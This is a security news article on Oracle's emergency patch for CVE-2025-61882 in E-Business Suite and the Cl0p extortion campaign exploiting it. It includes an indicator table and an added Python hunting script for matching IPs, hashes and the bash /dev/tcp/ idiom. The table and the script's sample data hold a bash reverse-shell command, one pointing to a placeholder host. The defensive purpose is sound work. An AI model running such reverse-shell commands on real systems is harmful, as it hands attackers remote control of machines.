Oracle patches critical E-Business Suite flaw exploited by Cl0p hackers

Oracle fixed a critical flaw (CVE-2025-61882, CVSS 9.8) in E-Business Suite that is actively exploited by Cl0p cybercrime group.

Oracle released an emergency patch to address a critical vulnerability, tracked as CVE-2025-61882 (CVSS 9.8), in its E-Business Suite.

“Updated [10/04/2025]: Oracle has issued Oracle Security Alert Advisory – CVE-2025-61882 to provide updates against additional potential exploitation that were discovered during our investigation.” reads the alert published by the company. “We strongly recommend Oracle E-Business Suite (EBS) customers apply the guidance provided by this Security Alert as soon as possible.”

The flaw was exploited by the Cl0p ransomware group in data theft attacks. Unauthenticated remote attackers can exploit the flaw to take control of the Oracle Concurrent Processing component.

CVE-2025-61882 affects Oracle E-Business Suite versions 12.2.3 through 12.2.14 (BI Publisher Integration); experts warn that it is easily exploitable over HTTP.

“This vulnerability is remotely exploitable without authentication, i.e., it may be exploited over a network without the need for a username and password. If successfully exploited, this vulnerability may result in remote code execution.” reads the advisory. “Oracle strongly recommends that customers apply the updates provided by this Security Alert as soon as possible.”

The advisory also includes the indicators of compromise (IP addresses, observed commands, and files) to allow immediate detection, hunting, and containment:

| Indicator | Type | Description |
| --- | --- | --- |
| 200[.]107[.]207[.]26 | IP | Potential GET and POST activity |
| 185[.]181[.]60[.]11 | IP | Potential GET and POST activity |
| sh -c /bin/bash -i >& /dev/tcp// 0>&1 | Command | Establish an outbound TCP connection over a specific port |
| 76b6d36e04e367a2334c445b51e1ecce97e4c614e88dfb4f72b104ca0f31235d | SHA-256 | oracle_ebs_nday_exploit_poc_scattered_lapsus_retard_cl0p_hunters.zip |
| aa0d3859d6633b62bccfb69017d33a8979a3be1f3f0a5a4bf6960d6c73d41121 | SHA-256 | oracle_ebs_nday_exploit_poc_scattered_lapsus_retard-cl0p_hunters/exp.py |
| 6fd538e4a8e3493dda6f9fcdc96e814bdd14f3e2ef8aa46f0143bff34b882c1b | SHA-256 | oracle_ebs_nday_exploit_poc_scattered_lapsus_retard-cl0p_hunters/server.py |
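As an added hunting example (not part of Oracle's advisory or this article), the script below turns the indicators from the table into three checks a defender can run offline: matching the two advisory IPs against web-server access-log lines, flagging process command lines that use the bash /dev/tcp/ outbound-shell idiom from the observed command, and comparing file hashes against the three SHA-256 values. The log lines and command lines are constructed sample data; the host and port in the sample command are placeholders because the advisory redacts them.

```python
import hashlib
import re

# Indicators copied from the Oracle Security Alert table above; the advisory
# prints IPs defanged with "[.]", so they are refanged before matching.
IOC_IPS = {ip.replace("[.]", ".") for ip in ("200[.]107[.]207[.]26", "185[.]181[.]60[.]11")}
IOC_SHA256 = {
    "76b6d36e04e367a2334c445b51e1ecce97e4c614e88dfb4f72b104ca0f31235d",
    "aa0d3859d6633b62bccfb69017d33a8979a3be1f3f0a5a4bf6960d6c73d41121",
    "6fd538e4a8e3493dda6f9fcdc96e814bdd14f3e2ef8aa46f0143bff34b882c1b",
}
# The advisory redacts host and port in the observed command, so match the bash
# "/dev/tcp/" outbound-shell idiom itself rather than any specific destination.
DEV_TCP_RE = re.compile(r"/dev/tcp/\S*")
# Combined-format access log: client IP first, request in the first quoted field.
ACCESS_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]*\] "([^"]*)"')


def scan_access_log(lines):
    """Return (line_no, client_ip, request) for lines whose client IP is an IoC."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = ACCESS_RE.match(line)
        if m and m.group(1) in IOC_IPS:
            hits.append((n, m.group(1), m.group(2)))
    return hits


def scan_cmdlines(cmdlines):
    """Return process command lines that use the /dev/tcp/ outbound-shell idiom."""
    return [c for c in cmdlines if DEV_TCP_RE.search(c)]


def sha256_is_ioc(content: bytes) -> bool:
    """True when a file's SHA-256 matches one of the advisory's three hashes."""
    return hashlib.sha256(content).hexdigest() in IOC_SHA256


# Constructed sample telemetry (not real data); /OA_HTML/ is the EBS web root.
SAMPLE_ACCESS_LOG = [
    '10.0.0.5 - - [05/Oct/2025:10:00:01 +0000] "GET /OA_HTML/AppsLogin HTTP/1.1" 200 1532',
    '200.107.207.26 - - [05/Oct/2025:10:00:07 +0000] "POST /OA_HTML/AppsLogin HTTP/1.1" 200 311',
    '185.181.60.11 - - [05/Oct/2025:10:00:09 +0000] "GET / HTTP/1.1" 200 98',
]
# Host and port below are constructed placeholders (TEST-NET address); the advisory redacts them.
SAMPLE_CMDLINES = [
    "sh -c /bin/bash -i >& /dev/tcp/203.0.113.9/443 0>&1",
    "sh -c /usr/bin/find /tmp -mtime +7 -delete",
]
```

Point scan_access_log at real access-log lines and sha256_is_ioc at file contents from the EBS application tier to run the same checks on production data.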

Last week, Google Mandiant and Google Threat Intelligence Group (GTIG) researchers reported suspected Cl0p ransomware group activity in which threat actors attempted to extort executives by claiming to have stolen Oracle E-Business Suite data.

“A group of hackers claimed to have breached Oracle’s E-Business Suite, which runs core operations including financial, supply chain and customer relationship management. In one case, they demanded a ransom of up to $50 million, according to cybersecurity firm Halcyon, which is currently responding to the campaign. The group, which claims to be affiliated with a criminal outfit called Cl0p, has provided proof of compromise to victims including screenshots and file trees.” reported Bloomberg.

“At least one company has confirmed that data from their Oracle systems has been stolen, according to one of the people.”

Attackers likely compromised user email accounts and abused Oracle E-Business Suite's default password-reset flow to obtain valid credentials, reported cybersecurity firm Halcyon.

“We have seen Cl0p demand huge seven- and eight-figure ransoms in the last few days,” said Cynthia Kaiser, vice president at Halcyon’s ransomware research center. “This group is notorious for stealthy, mass data theft that heightens their leverage in ransom negotiations.”

“This activity began on or before September 29, 2025, but Mandiant’s experts are still in the early stages of multiple investigations, and have not yet substantiated the claims made by this group,” said Genevieve Stark, Head of Cybercrime and Information Operations Intelligence Analysis at GTIG.

Stark said an email in the extortion notes ties to a Cl0p affiliate and includes Cl0p site contacts, but Google lacks proof to confirm the attackers’ claims.

Mandiant’s CTO Charles Carmakal said attackers use hundreds of hacked accounts in a mass extortion campaign. At least one account links to the financially motivated hacker group FIN11.

Since August 2020, FIN11 has been targeting organizations in many industries, including defense, energy, finance, healthcare, legal, pharmaceutical, telecommunications, technology, and transportation. The extortion group was observed deploying the Clop ransomware into the networks of its victims.

The researchers believe FIN11 operates from the Commonwealth of Independent States (CIS – former Soviet Union countries). In 2020, Mandiant experts observed Russian-language file metadata in the code of the malware and reported that the Clop ransomware was only deployed on machines with a keyboard layout used outside CIS countries.

At the time, researchers from FireEye’s Mandiant observed FIN11 hackers using spear-phishing messages to distribute a malware downloader dubbed FRIENDSPEAK.

“The malicious emails contain contact information, and we’ve verified that the two specific contact addresses provided are also publicly listed on the Cl0p data leak site (DLS),” Carmakal added. “This move strongly suggests there’s some association with Cl0p, and they are leveraging the brand recognition for their current operation.”

Halcyon, citing people familiar with the matter, said it believed the threat actors had exploited a vulnerability in Oracle's E-Business Suite.

Mandiant researchers recommend that organizations investigate their environments for indicators of compromise associated with the Cl0p operation.

Cl0p has launched major attacks in recent years, exploiting zero-day flaws in popular software such as Accellion, SolarWinds, Fortra GoAnywhere, and MOVEit.


Pierluigi Paganini

(SecurityAffairs – hacking, newsletter)
